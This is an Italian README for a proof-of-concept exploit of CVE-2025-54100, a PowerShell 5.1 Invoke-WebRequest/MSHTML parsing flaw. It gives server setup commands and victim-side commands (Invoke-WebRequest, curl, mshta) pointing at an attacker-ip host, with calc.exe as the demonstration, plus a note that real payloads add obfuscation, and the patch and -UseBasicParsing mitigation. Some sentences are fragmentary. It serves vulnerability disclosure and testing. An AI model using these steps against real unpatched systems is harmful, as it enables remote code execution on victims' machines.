
CVE-2025-54100 (CVSS 7.8 Alto) è una vulnerabilità di command injection nel cmdlet Invoke-WebRequest di Windows PowerShell 5.1. Deriva da una neutralizzazione impropria di elementi speciali durante l'analisi automatica delle risposte Web.
Un Proof-of-Concept conciso che mostra come CVE-2025-54100 possa portare a Esecuzione di Codice Remoto (RCE) in Windows PowerShell 5.1 attraverso il parsing HTML dannoso.
Invoke-WebRequest quando non si utilizza -UseBasicParsingActiveXObject) nel contesto del chiamante.CVE-2025-54100.py serve un payload HTML appositamente costruito.WScript.Shell / Shell.Application.calc.exe.python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
Avvia il server HTTP del PoC:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
Esegui questi su una macchina Windows vulnerabile senza -UseBasicParsing:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
# curl alias
curl http://<attacker-ip>:8888
# mshta
mshta http://<attacker-ip>:8888
Usa la stessa porta che hai configurato per il server. Se vulnerabile, lo script incorporato viene eseguito tramite il parser MSHTML. Alcuni prodotti AV potrebbero bloccare il comportamento anche se il problema di parsing è presente.
Se calc.exe non appare:
Invoke-WebRequest senza -UseBasicParsing.Questo dimostra il vettore di esecuzione. I payload reali potrebbero utilizzare offuscamento o bypass aggiuntivi per eludere le restrizioni predefinite.

Microsoft ha corretto il problema a dicembre 2025:
-UseBasicParsing per evitare il parsing MSHTML:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
[!WARNING] Solo per uso educativo e test autorizzati. Utilizza responsabilmente e rispetta tutte le leggi applicabili. Gli autori non sono responsabili per uso improprio o danni.